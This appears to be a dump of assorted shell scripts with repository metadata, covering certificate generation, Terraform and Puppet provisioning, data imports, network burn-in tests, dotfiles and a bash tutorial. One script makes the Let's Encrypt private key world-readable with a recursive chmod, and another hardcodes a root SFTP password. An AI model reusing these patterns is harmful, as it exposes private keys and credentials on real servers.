./certbot-auto certonly --manual --preferred-challenges=dns --email=$email --agree-tos -d *.$domain || printErrorAndExit "Unable to generate certificate for domain *.$domain"
local directoryName=$(sudo ls -l /etc/letsencrypt/archive/ | awk '{print $9}' | grep -E "$domain(-[0-9]+)*" | tail -n 1)
local certDir=/etc/letsencrypt/live/$directoryName
export tlsCert=$certDir/fullchain.pem
export tlsKey=$certDir/privkey.pem
sudo chmod +r -R $certDir
sudo ls -l $tlsCert > /dev/null || printErrorAndExit "File $tlsCert not found"
sudo ls -l $tlsKey > /dev/null || printErrorAndExit "File $tlsKey not found"
printInfo "Certificate FullChain and PrivateKey generated: $tlsCert, $tlsKey"
sudo cp $tlsCert $tlsCertOut
sudo cp $tlsKey $tlsKeyOut
sudo chown $USER $tlsCertOut
sudo chown $USER $tlsKeyOut
return 0
}
export -f generateCertsDnsChallenge
function initTfVars() {
local file=$1
[ -f $file ] && rm $file
echo "domain = \"$domain\"" >> $file
echo "kube_config = $(getKubeConfig)" >> $file
echo "kathra_version = \"$kathraImagesTag\"" >> $file
[ $manualDnsChallenge -eq 1 ] && echo "tls_cert_filepath = \"$tmp/tls.cert\"" >> $file
[ $manualDnsChallenge -eq 1 ] && echo "tls_key_filepath = \"$tmp/tls.key\"" >> $file
[ $automaticDnsChallenge -eq 1 ] && echo "acme_provider = \"$acmeDnsProvider\"" >> $file
[ $automaticDnsChallenge -eq 1 ] && echo "acme_config = ${acmeDnsConfig}" >> $file
}
export -f initTfVars
function terraformInitAndApply() {
terraform init || printErrorAndExit "Unable to init terraform"
local retrySecondInterval=10
local attempt_counter=0
local max_attempts=5
while true; do
terraform apply -auto-approve && return 0
printError "Terraform : Unable to apply, somes resources may be not ready, try again.. attempt ($attempt_counter/$max_attempts) "
[ ${attempt_counter} -eq ${max_attempts} ] && printError "Check $1, error" && printErrorAndExit "Unable to apply after several attempts"
attempt_counter=$(($attempt_counter+1))
sleep $retrySecondInterval
done
}
export -f terraformInitAndApply
| true
|
581c9a152742b25a6a3436704d0f82d4a3941c6a
|
Shell
|
lukaszgryglicki/devstats
|
/prometheus/psql.sh
|
UTF-8
| 1,203
| 2.703125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
function finish {
sync_unlock.sh
}
if [ -z "$TRAP" ]
then
sync_lock.sh || exit -1
trap finish EXIT
export TRAP=1
fi
set -o pipefail
> errors.txt
> run.log
GHA2DB_PROJECT=prometheus IDB_DB=prometheus PG_DB=prometheus GHA2DB_LOCAL=1 ./structure 2>>errors.txt | tee -a run.log || exit 1
GHA2DB_PROJECT=prometheus IDB_DB=prometheus PG_DB=prometheus GHA2DB_LOCAL=1 ./gha2db 2015-01-01 0 today now 'prometheus' 2>>errors.txt | tee -a run.log || exit 2
GHA2DB_PROJECT=prometheus IDB_DB=prometheus PG_DB=prometheus GHA2DB_LOCAL=1 GHA2DB_OLDFMT=1 GHA2DB_EXACT=1 ./gha2db 2014-01-06 0 2014-12-31 23 'prometheus/prometheus' 2>>errors.txt | tee -a run.log || exit 3
GHA2DB_PROJECT=prometheus IDB_DB=prometheus PG_DB=prometheus GHA2DB_LOCAL=1 GHA2DB_MGETC=y GHA2DB_SKIPTABLE=1 GHA2DB_INDEX=1 ./structure 2>>errors.txt | tee -a run.log || exit 4
./prometheus/setup_repo_groups.sh 2>>errors.txt | tee -a run.log || exit 5
./prometheus/setup_scripts.sh 2>>errors.txt | tee -a run.log || exit 6
./prometheus/import_affs.sh 2>>errors.txt | tee -a run.log || exit 7
./prometheus/get_repos.sh 2>>errors.txt | tee -a run.log || exit 8
echo "All done. You should run ./prometheus/reinit.sh script now."
| true
|
ebf22b62f40e031ebb8835042ccf9f08c14d7d13
|
Shell
|
Danilo7/DevOps-Php-MySQL-Tools
|
/php/php_xdebug.sh
|
UTF-8
| 658
| 3.390625
| 3
|
[] |
no_license
|
#!/bin/env bash
# Simple script to enable or disable the xdebug extension
case $1 in
on)
if [[ -f /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini.deactivated ]]; then
echo 'haha'
mv /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini.deactivated /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini
kill -USR2 1
fi
;;
off)
if [[ -f /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini ]]; then
mv /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini /usr/local/etc/php/conf.d/docker-php-ext-xdebug.ini.deactivated
kill -USR2 1
echo 'ehe'
fi
;;
*)
echo "Usage: php_debug on|off"
;;
esac
| true
|
5fdcfdc5b08fff7a6258bddfcaa127b68feed87a
|
Shell
|
cantecim/dotfiles
|
/.bashrc
|
UTF-8
| 272
| 3.328125
| 3
|
[] |
no_license
|
export LANG=en_US.UTF-8
export LC_ALL=$LANG
export LANGUAGE=$LANG
mkcdir ()
{
mkdir -p -- "$1" && cd -P -- "$1"
}
commitWithMessage() {
message="$*"
git commit -m "$message"
}
ec2Fingerprint() {
openssl pkcs8 -in $1 -nocrypt -topk8 -outform DER | openssl sha1 -c
}
| true
|
d0bb0b8bf5c883f1643ba51d7744275bfc55b35f
|
Shell
|
puddu1/codeslist
|
/ones.sh
|
UTF-8
| 61
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
j=1
a=1
for i in {1..5}
do
echo $a
a=$a$j
done
| true
|
e4eb604e26bf23ddd726a06e8518cf423cc47871
|
Shell
|
mccart/phoenix
|
/scripts/bootstrap.sh
|
UTF-8
| 271
| 3.3125
| 3
|
[] |
no_license
|
APP="phoenix"
STARTDIR="$PWD"
DIR=`dirname $0`
cd $DIR
#Reset Minikube
./reset.sh
if [ $? -eq 0 ]
then
#Create/Apply secret
./create-secret.sh $APP
kubectl apply -f $APP-secret.yaml
#Build and deploy application
cd ..
./scripts/update.sh
fi
cd $STARTDIR
| true
|
c6b7f4274803051a9f23b109952e9e73ed4bda58
|
Shell
|
langdoc/FRechdoc
|
/forced_alignment/sox_aeneas.sh
|
UTF-8
| 387
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
for wav in `ls MONO*WAV | egrep 'MONO\-\d\d\d\.WAV+'`
do
output=$(echo $wav | sed 's/.WAV/-song1.WAV/g')
sox $wav song1/$output trim 0 284
done
for wav in `ls song1/MONO*song1*WAV`
do
output=$(echo $wav | sed 's/.WAV/.eaf/g')
aeneas_execute_task \
$wav \
song1.txt \
"task_language=ukr|os_task_file_format=eaf|is_text_type=plain" \
$output
done
| true
|
7e135ccc66a2a7a982f3abe91760d1787d6366c6
|
Shell
|
know-ops/git-actions
|
/lib/git/commit.bash
|
UTF-8
| 164
| 3.09375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
git_commit() {
git add .
if [ -z "${KO_COMMIT_MSG}" ]; then
KO_COMMIT_MSG="[CHORE] > "
fi
git commit -m "${KO_COMMIT_MSG}${1}"
}
| true
|
a7fe20bf390844d71f9502d9592034afdd07fa99
|
Shell
|
ajaykumar011/scripting-course
|
/escape.sh
|
UTF-8
| 114
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
# while loop with break.
a=10
echo -e "Value of a is $a \nThis is new line"
echo -e "Value of a is $a"
| true
|
d7b609e5b9eb5a3c4c70ec8fd3718147f3978b04
|
Shell
|
petronny/aur3-mirror
|
/djv-git/PKGBUILD
|
UTF-8
| 1,101
| 2.703125
| 3
|
[] |
no_license
|
# Maintainer: N30N <archlinux@alunamation.com>
# Contributer: Jonathan Liu <net147@gmail.com>
pkgname="djv-git"
provides=("djv")
pkgver=1.0.5.r65.ga631914
pkgrel=1
pkgdesc="Image sequence and movie playback and processing software for film production, VFX, and computer animation"
url="http://djv.sourceforge.net/"
license=("BSD")
arch=("i686" "x86_64")
depends=("desktop-file-utils" "qt5-base" "glew" "ffmpeg" "libjpeg" "libpng" "libtiff" "libquicktime" "openexr")
makedepends=("cmake" "qt5-tools" "portaudio")
options=("!docs")
install="${pkgname}.install"
source=("${pkgname}::git://git.code.sf.net/p/djv/git")
md5sums=("SKIP")
pkgver() {
cd "${pkgname}"
(
set -o pipefail
git describe --long --tags 2>/dev/null | sed 's/\([^-]*-g\)/r\1/;s/-/./g' ||
printf "r%s.%s" "$(git rev-list --count HEAD)" "$(git rev-parse --short HEAD)"
)
}
build() {
rm -fr build
mkdir build
cd build
cmake -D CMAKE_INSTALL_PREFIX:PATH=/usr "../${pkgname}"
make
}
package() {
install -Dm644 "${pkgname}/LICENSE" \
"${pkgdir}/usr/share/licenses/${pkgname}/LICENSE"
cd build
make DESTDIR=${pkgdir} install
}
# vim: set noet ff=unix
| true
|
ab49820efb4b3c5bc111cc1d6a5bead1dc3e3b74
|
Shell
|
beautifularea/Master_Shell_Sed_Awk_or
|
/uploadcfg.sh
|
UTF-8
| 583
| 3.3125
| 3
|
[] |
no_license
|
#!/bin/bash
ips=$1
FILE="skywelld.cfg"
#################
## config
#################
USER=root
PASSWORD=password
IP=0
PORT=22
SRCDIR=/home/zhtian/sftpload/sftpFiles #skywelld ca proto.gz server.crl
DESDIR=/root
readIPs()
{
while read myline
do
#read ips
echo
echo -e "\033[41;36mUPLOADING IP : \033[0m"$myline
IP=$myline
echo "uploading file : "${FILE}
#:<<!
lftp -u ${USER},${PASSWORD} sftp://${IP}:${PORT} <<EOF
cd ${DESDIR}/
lcd ${SRCDIR}
put ${FILE}
by
EOF
#!
echo -e "\033[41;36mUPLOADING DONE. \033[0m"
echo
done < $ips
}
readIPs
| true
|
03310d5e5e7a1c9aa72d500766d84de4de4cc569
|
Shell
|
JioCloudVPC/puppet-vpc
|
/build_scripts/make_userdata_vrouter.sh
|
UTF-8
| 4,351
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -xe
cat <<EOF >userdata_vrouter.txt
#!/bin/bash
date
set -x
release="\$(lsb_release -cs)"
if [ -n "${git_protocol}" ]; then
export git_protocol="${git_protocol}"
fi
if [ -n "${env_http_proxy}" ]
then
export http_proxy=${env_http_proxy}
echo http_proxy="'${env_http_proxy}'" >> /etc/environment
internal_subnet_exclusion=",${env_subnet}"
echo 'Acquire::Http::Proxy "${env_http_proxy}";' >> /etc/apt/apt.conf.d/90Proxy
export no_proxy="127.0.0.1,169.254.169.254,localhost,consul,jiocloudservices.com\${internal_subnet_exclusion}"
echo no_proxy="'127.0.0.1,169.254.169.254,localhost,consul,jiocloudservices.com\${internal_subnet_exclusion}'" >> /etc/environment
fi
if [ -n "${env_https_proxy}" ]
then
export https_proxy=${env_https_proxy}
echo https_proxy="'${env_https_proxy}'" >> /etc/environment
fi
if [ -n "${puppet_vpc_repo_url}" ];then
if [ -z "\`grep '${puppet_vpc_repo_url}' /etc/apt/sources.list\`" ];then
echo "deb [arch=amd64] ${puppet_vpc_repo_url} jiocloud main" | tee -a /etc/apt/sources.list
wget -qO - ${puppet_vpc_repo_url}/repo.key | apt-key add -
fi
fi
wget -O puppet.deb -t 5 -T 30 http://apt.puppetlabs.com/puppetlabs-release-\${release}.deb
dpkg -i puppet.deb
apt-get update
apt-get install -y puppet software-properties-common puppet-vpc
mkdir /etc/facter
mkdir /etc/facter/facts.d
if [ -n "${puppet_modules_source_repo}" ]; then
apt-get install -y git
git clone ${puppet_modules_source_repo} /tmp/rjil
if [ -n "${puppet_modules_source_branch}" ]; then
pushd /tmp/rjil
git checkout ${puppet_modules_source_branch}
popd
fi
if [ -n "${pull_request_id}" ]; then
pushd /tmp/rjil
git fetch origin pull/${pull_request_id}/head:test_${pull_request_id}
git config user.email "testuser@localhost.com"
git config user.name "Test User"
git merge -m 'Merging Pull Request' test_${pull_request_id}
popd
fi
time gem install librarian-puppet-simple --no-ri --no-rdoc;
mkdir -p /etc/puppet/manifests.overrides
cp /tmp/rjil/site.pp /etc/puppet/manifests.overrides/
mkdir -p /etc/puppet/hiera.overrides
sed -i "s/ :datadir: \/etc\/puppet\/hiera\/data/ :datadir: \/etc\/puppet\/hiera.overrides\/data/" /tmp/rjil/hiera/hiera.yaml
cp /tmp/rjil/hiera/hiera.yaml /etc/puppet
cp -Rf /tmp/rjil/hiera/data /etc/puppet/hiera.overrides
mkdir -p /etc/puppet/modules.overrides/rjil
cp -Rf /tmp/rjil/* /etc/puppet/modules.overrides/rjil/
if [ -n "${module_git_cache}" ]
then
cd /etc/puppet/modules.overrides
wget -O cache.tar.gz "${module_git_cache}"
tar xzf cache.tar.gz
time librarian-puppet update --puppetfile=/tmp/rjil/Puppetfile --path=/etc/puppet/modules.overrides
else
time librarian-puppet install --puppetfile=/tmp/rjil/Puppetfile --path=/etc/puppet/modules.overrides
fi
cat <<INISETTING | puppet apply --config_version='echo settings'
ini_setting { basemodulepath: path => "/etc/puppet/puppet.conf", section => main, setting => basemodulepath, value => "/etc/puppet/modules.overrides:/etc/puppet/modules" }
ini_setting { default_manifest: path => "/etc/puppet/puppet.conf", section => main, setting => default_manifest, value => "/etc/puppet/manifests.overrides/site.pp" }
ini_setting { disable_per_environment_manifest: path => "/etc/puppet/puppet.conf", section => main, setting => disable_per_environment_manifest, value => "true" }
INISETTING
else
puppet apply --config_version='echo settings' -e "ini_setting { default_manifest: path => \"/etc/puppet/puppet.conf\", section => main, setting => default_manifest, value => \"/etc/puppet/manifests/site.pp\" }"
fi
echo 'env='${env} > /etc/facter/facts.d/env.txt
echo 'cloud_provider='${cloud_provider} > /etc/facter/facts.d/cloud_provider.txt
while true
do
# first install all packages to make the build as fast as possible
puppet apply --detailed-exitcodes \`puppet config print default_manifest\` --config_version='echo packages' --tags package
ret_code_package=\$?
# now perform base config
puppet apply --detailed-exitcodes --debug \`puppet config print default_manifest\`
ret_code_jio=\$?
if [[ \$ret_code_jio = 1 || \$ret_code_jio = 4 || \$ret_code_jio = 6 || \$ret_code_package = 1 || \$ret_code_package = 4 || \$ret_code_package = 6 ]]
then
echo "Puppet failed. Will retry in 5 seconds"
sleep 5
else
break
fi
done
date
EOF
| true
|
371db1e6efedf15afd60212c1b15f2d82e2b0fcb
|
Shell
|
danielmarschall/uuid_mac_utils
|
/download-webdata.sh
|
UTF-8
| 1,728
| 2.84375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
DIR=$( dirname "$0" )
if [ ! -d "$DIR"/web-data ]; then
mkdir "$DIR"/web-data
echo "Order Deny,Allow" > "$DIR"/web-data/.htaccess
echo "Deny From All" >> "$DIR"/web-data/.htaccess
fi
# Note: The Individual Address Block (IAB) is an inactive registry activity, which has been replaced by the MA-S registry product as of January 1, 2014.
#wget https://standards-oui.ieee.org/iab/iab.txt -O "$DIR"/web-data/iab.txt
curl https://standards-oui.ieee.org/iab/iab.txt --output "$DIR"/web-data/iab.txt
if [ $? -ne 0 ]; then
sleep 300
wget https://standards-oui.ieee.org/iab/iab.txt -O "$DIR"/web-data/iab.txt
fi
#wget https://standards-oui.ieee.org/oui/oui.txt -O "$DIR"/web-data/oui.txt
curl https://standards-oui.ieee.org/oui/oui.txt --output "$DIR"/web-data/oui.txt
if [ $? -ne 0 ]; then
sleep 300
wget https://standards-oui.ieee.org/oui/oui.txt -O "$DIR"/web-data/oui.txt
fi
#wget https://standards-oui.ieee.org/oui28/mam.txt -O "$DIR"/web-data/mam.txt
curl https://standards-oui.ieee.org/oui28/mam.txt --output "$DIR"/web-data/mam.txt
if [ $? -ne 0 ]; then
sleep 300
wget https://standards-oui.ieee.org/oui28/mam.txt -O "$DIR"/web-data/mam.txt
fi
#wget https://standards-oui.ieee.org/oui36/oui36.txt -O "$DIR"/web-data/oui36.txt
curl https://standards-oui.ieee.org/oui36/oui36.txt --output "$DIR"/web-data/oui36.txt
if [ $? -ne 0 ]; then
sleep 300
wget https://standards-oui.ieee.org/oui36/oui36.txt -O "$DIR"/web-data/oui36.txt
fi
#wget https://standards-oui.ieee.org/cid/cid.txt -O "$DIR"/web-data/cid.txt
curl https://standards-oui.ieee.org/cid/cid.txt --output "$DIR"/web-data/cid.txt
if [ $? -ne 0 ]; then
sleep 300
wget https://standards-oui.ieee.org/cid/cid.txt -O "$DIR"/web-data/cid.txt
fi
| true
|
dd9224f2b393856a89d75fd1d919246156126a5d
|
Shell
|
ADVANTECH-Corp/advtest-burnin
|
/scripts/burnin_ethernet.sh
|
UTF-8
| 2,411
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/bash
mountpoint=/home/root/advtest/burnin/log
mkdir -p ${mountpoint}/ethernet
testTime=`date +%Y%m%d.%H.%M.%S`
LOGFILE="${mountpoint}/ethernet/$1_${testTime}.txt"
Google=216.239.32.6
ethernet_test() {
declare -i count
declare -i total_fail
declare -i total_pass
count=0
total_fail=0
total_pass=0
if [[ ! -e "/home/root/advtest/burnin/scripts/burnin_ping_IP_config.sh" ]]; then
#WEBSERVER=`ifconfig $1 |grep 'inet addr' |cut -d : -f2 | awk '{print $1}'`
HOST_IP=$Google
echo "Don't edit Ping IP test configuration in main menu, currently use default $1 ping Google IP \"$HOST_IP\" "
echo "[`date +%Y%m%d.%H.%M.%S`] use default $1 ping IP \"$HOST_IP\" " >> $LOGFILE
else
HOST_IP=`cat /home/root/advtest/burnin/scripts/burnin_ping_IP_config.sh |grep "$3_IP" |awk 'BEGIN {FS="="} {print $2}'`
eth_IP=`cat /home/root/advtest/burnin/scripts/burnin_ping_IP_config.sh |grep "$1_IP" |awk 'BEGIN {FS="="} {print $2}'`
echo "Currently use $eth_IP ping IP $HOST_IP that has been configured in ./scripts/burnin_ping_IP_config.sh "
echo "[`date +%Y%m%d.%H.%M.%S`] use $eth_IP ping $HOST_IP" >> $LOGFILE
fi
if ! ifconfig $1 down; then
echo "Device $1 not found!"
fi
sleep 5
if ! ifconfig $1 $eth_IP up; then
echo "Device $1 not found!"
fi
if [[ $2 -eq 0 ]]; then
while true;do
((count++))
echo "[`date +%Y%m%d.%H.%M.%S`] (count:$count / infinite)" >> $LOGFILE
(ping $HOST_IP -I $1 -c 1 | tee -a $LOGFILE) 2>&1 > /dev/null
log_result=`tail -n 2 $LOGFILE`
if [[ $log_result == *"100%"* ]]; then
((total_fail++))
else
((total_pass++))
fi
echo ">> pass/fail/count:$total_pass/$total_fail/$count" >> $LOGFILE
echo "" >> $LOGFILE
sleep 1
done
else
for((i=1;i<=$2;i++)) do
((count++))
echo "[`date +%Y%m%d.%H.%M.%S`] (count:$count / $2)" >> $LOGFILE
(ping $HOST_IP -I $1 -c 1 | tee -a $LOGFILE) 2>&1 > /dev/null
log_result=`tail -n 2 $LOGFILE`
if [[ $log_result == *"100%"* ]]; then
((total_fail++))
else
((total_pass++))
fi
echo ">> pass/fail/count:$total_pass/$total_fail/$count" >> $LOGFILE
echo "" >> $LOGFILE
sleep 1
done
echo "Test is completed!!!" >> $LOGFILE
fi
}
echo "Ethernet Log file : ${LOGFILE}"
echo "${LOGFILE} \\" >> ./cache.txt
ethernet_test $1 $2 $3
| true
|
a38ebf9e878231ac6b957a958bc354ee0f1b644a
|
Shell
|
vovarbv/akash-postgres-restore
|
/scripts/create.sh
|
UTF-8
| 407
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/bash
# Check if another instance of script is running
pidof -o %PPID -x $0 >/dev/null && echo "ERROR: Script $0 already running" && exit 1
set -e
echo "Creating database"
export PGPASSWORD=$POSTGRES_PASSWORD
echo "SELECT 'CREATE DATABASE $POSTGRES_DATABASE' \
WHERE NOT EXISTS \
(SELECT FROM pg_database WHERE datname = '$POSTGRES_DATABASE')\gexec" |
psql -h postgres -p 5432 -U $POSTGRES_USER
| true
|
9beaf669e06770b43c79b0fcfe91b957019e2427
|
Shell
|
lguerrin/browsergopass
|
/browsergopass-wrapper
|
UTF-8
| 179
| 2.75
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Add some path to PATH on MacOS
DIR="$( cd "$( dirname "$0" )" && pwd )"
export GPG_TTY="$(tty)"
export PATH="$PATH:/usr/local/bin"
$DIR/browsergopass "$@"
exit $?
| true
|
a173bb73a2114d3a9b362d7eebcdc21a65372b21
|
Shell
|
kantrootaix/shellLinux
|
/creatusers.sh
|
UTF-8
| 610
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/bash
while true
do
read -p "Base de nom des comptes a crรฉer :" BASE
if [[ "${BASE}" = +([[:lower:]]) ]]
then break
fi
done
while true
do
read -p "Nombre d'utilisateurs a crรฉer :" NBR
if [[ "${NBR}" = +([[:digit:]]) ]]
then break
fi
done
read -p "Numero du premier utilisateur (dรฉfaut: 1) :" NUM
if [ -z ${NUM} ]
then NUM=1
fi
COUNT=0
while (( "${COUNT}"<"${NBR}" ))
do
for USER in $(awk -F: '{print $1}' /etc/passwd)
do
if [ "${USER}" = "${BASE}${NUM}" ]
then exit 1
fi
done
echo "Creation du compte : ${BASE}${NUM}"
((COUNT++))
((NUM++))
done
| true
|
b243e9319c15fe5be7016167cbeabaa49324309c
|
Shell
|
dabosmo/actividad_6b
|
/ejerc4.sh
|
UTF-8
| 599
| 3.59375
| 4
|
[] |
no_license
|
maxlineas=`cat numeros.txt | wc -l`
linea=1
total_par=0
total_impar=0
while [ $linea -le $maxlineas ]; do
i=`cat numeros.txt | head -$linea | tail -1 `
resto=$((i % 2))
if [ $resto -ne 0 ]; then
echo "$i" >> impares.txt
total_impar=$((total_impar + i))
else echo "$i" >> pares.txt
total_par=$((total_par + i))
fi
linea=$((linea+1))
done
echo "Los numeros pares son: "
cat pares.txt
echo "Y su total es: $total_par"
echo "Los numeros impares son: "
cat impares.txt
echo "Y su total es: $total_impar"
echo "" > pares.txt
echo "" > impares.txt
| true
|
3125ae9a1d6ce01e61fe63e9b2e2192783118965
|
Shell
|
roovo/dotfiles
|
/bash/bash_profile.symlink
|
UTF-8
| 1,101
| 3.546875
| 4
|
[
"MIT"
] |
permissive
|
# vi: set ft=sh :
# Load in .git-completion.bash ------------------------------------
source ~/.bin/git-completion.bash
# Load in .bashrc -------------------------------------------------
source ~/.bashrc
# Hello Messsage --------------------------------------------------
echo -e "Kernel Information: " `uname -smr`
echo -e "${COLOR_BROWN}`bash --version`"
echo -ne "${COLOR_GRAY}Uptime: "; uptime
echo -ne "${COLOR_GRAY}Server time is: "; date
# SSH agent -------------------------------------------------------
if [[ $OS == 'linux' ]]; then
SSH_ENV="$HOME/.ssh/environment"
function start_agent {
echo "Initialising new SSH agent..."
/usr/bin/ssh-agent | sed 's/^echo/#echo/' > "${SSH_ENV}"
echo succeeded
chmod 600 "${SSH_ENV}"
. "${SSH_ENV}" > /dev/null
}
if [ -f "${SSH_ENV}" ]; then
. "${SSH_ENV}" > /dev/null
ps -ef | grep ${SSH_AGENT_PID} | grep ssh-agent$ > /dev/null || {
start_agent;
}
else
start_agent;
fi
fi
# set up rvm
[[ -s ~/.rvm/scripts/rvm ]] && source ~/.rvm/scripts/rvm # Load RVM into a shell session *as a function*
| true
|
58e538d6b8ea0df5943a915f6bd3d435f928aaa1
|
Shell
|
bellatoris/sh_practice
|
/ch9_variable_revisited/parameter_substitution.sh
|
UTF-8
| 2,904
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/bash
# ${parameter}
# ๋ณ์์ธ parameter์ ๊ฐ์ด๋ ๋ป์ผ๋ก์, $parameter๋ผ๊ณ ํ ๊ฒ๊ณผ ๊ฐ์ต๋๋ค.
# ์ด๋ค ๋ฌธ๋งฅ์์๋ ${parameter}๋ผ๊ณ ํ์คํ ์จ ์ค์ผ ๋์ํ๋ ์๋ ์์ต๋๋ค.
# ๋ฌธ์์ด ๋ณ์๋ค์ ์ฐ๊ฒฐํ ๋ ์ฐ์ผ ์ ์์ต๋๋ค.
your_id=${USER}-on-${HOSTNAME}
echo "$your_id"
#
echo "Old \$PATH = $PATH"
PATH=${PATH}:/opt/bin # ์คํฌ๋ฆฝํธ๊ฐ ๋๋ ๋์ $PATH ์ /opt/bin ์ ์ถ๊ฐ.
echo "New \$PATH = $PATH"
# ${parameter-default}
# ๋งค๊ฐ๋ณ์๊ฐ ์ธํธ๋์ง ์์๋ค๋ฉด default๋ฅผ ์ฌ์ฉํฉ๋๋ค.
echo ${username-$(whoami)}
# $username์ด ์ฌ์ ํ ์ธํธ๋์ด ์์ง ์๋ค๋ฉด `whoami`์ ๊ฒฐ๊ณผ๋ฅผ ์์ฝ.
# ์ฐธ๊ณ : ์ด๋ ๊ฒ ํ๋ฉด ${parameter:-default}๋ผ๊ณ ํ๋ ๊ฒ๊ณผ ๊ฑฐ์ ๋น์ทํ์ง๋ง :์ด ์์ ๋๋ ๋งค๊ฐ๋ณ์๊ฐ ์ ์ธ๋ง ๋์ด ๊ฐ์ด ๋์ผ ๊ฒฝ์ฐ์๋ ๊ธฐ๋ณธ๊ฐ์ ์ ์ฉ์ํต๋๋ค.
#!/bin/bash
username0=
# username0 ๋ ์ ์ธ๋ง ๋๊ณ ๋๋ก ์ธํธ๋์ต๋๋ค.
echo "username0 = ${username0-`whoami`}"
# ์์ฝ ๋์ง ์์ต๋๋ค.
echo "username1 = ${username1-`whoami`}"
# username1 ๋ ์ ์ธ๋์ง ์์์ต๋๋ค.
# ์์ฝ ๋ฉ๋๋ค.
username2=
# username2 ๋ ์ ์ธ๋ง ๋๊ณ ๋๊ณ ์ธํธ๋์ต๋๋ค.
echo "username2 = ${username2:-`whoami`}"
# ์กฐ๊ฑด ํ
์คํธ์ - ๊ฐ ์๋๊ณ :- ๋ฅผ ์ผ๊ธฐ ๋๋ฌธ์ ์์ฝ ๋ฉ๋๋ค.
# ${parameter=default}, ${parameter:=default}
# ๋งค๊ฐ๋ณ์๊ฐ ์ธํธ ๋์ด ์์ง ์๋ค๋ฉด ๊ธฐ๋ณธ๊ฐ์ผ๋ก ์ธํธ.
# ๋ ํํ๋ ๊ฑฐ์ ๋น์ทํ์ง๋ง :์ด ์์ ๋๋ ์์ ๊ฒฝ์ฐ์ฒ๋ผ $parameter๊ฐ ์ ์ธ๋ง ๋๊ณ ๊ฐ์ด ๋์ผ ๊ฒฝ์ฐ์๋ ๊ธฐ๋ณธ๊ฐ์ผ๋ก ์ธํธ ์ํจ๋ค๋ ์ฐจ์ด์ ์ด ์์ต๋๋ค [1]
echo ${username=`whoami`}
# "username" ๋ณ์๋ฅผ `whoami`์ ๊ฒฐ๊ณผ๋ก ์ธํธ.
# ${parameter+alt_value}, ${parameter:+alt_value}
# ๋งค๊ฐ๋ณ์๊ฐ ์ธํธ๋์ด ์๋ค๋ฉด alt_value๋ฅผ ์ฐ๊ณ ์๋๋ผ๋ฉด ๋ ์คํธ๋ง์ ์๋๋ค.
# ์ด ๋ ํํ๋ ๊ฑฐ์ ๋น์ทํ์ง๋ง parameter๊ฐ ์ ์ธ๋๊ณ ๋์ผ ๊ฒฝ์ฐ์ :์ด ์๊ณ ์๊ณ ์ ์ฐจ์ด๊ฐ ๋ํ๋ฉ๋๋ค. ์๋๋ฅผ ๋ณด์ธ์.
echo "###### \${parameter+alt_value} ########"
echo
a=${param1+xyz}
echo "a = $a" # a =
param2=
a=${param2+xyz}
echo "a = $a" # a = xyz
param3=123
a=${param3+xyz}
echo "a = $a" # a = xyz
echo
echo "###### \${parameter:+alt_value} ########"
echo
a=${param4:+xyz}
echo "a = $a" # a =
param5=
a=${param5:+xyz}
echo "a = $a" # a =
# a=${param5+xyz} ์ ๊ฒฐ๊ณผ๊ฐ ๋ค๋ฅด์ฃ ?
param6=123
a=${param6+xyz}
echo "a = $a" # a = xyz
# ${parameter?err_msg}, ${parameter:?err_msg}
# ๋งค๊ฐ๋ณ์๊ฐ ์ธํธ๋์ด ์์ผ๋ฉด ๊ทธ ๊ฐ์ ์ฐ๊ณ ์๋๋ผ๋ฉด err_msg๋ฅผ ์ถ๋ ฅ.
# ๋ ํํ๋ ์ญ์ ๋น์ทํ์ง๋ง :์ parameter๊ฐ ์ ์ธ๋ง ๋๊ณ ๋์ผ ๊ฒฝ์ฐ์๋ง ์ฐจ์ด์ ์ด ๋ํ๋ฉ๋๋ค.
echo ${hi?hahah} # hahah
hi=
echo ${hi?hahah} # ๊ณต๋ฐฑ
echo ${hello:?hahah} # hahah
hello=
echo ${hello:?hahah} # hahah
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.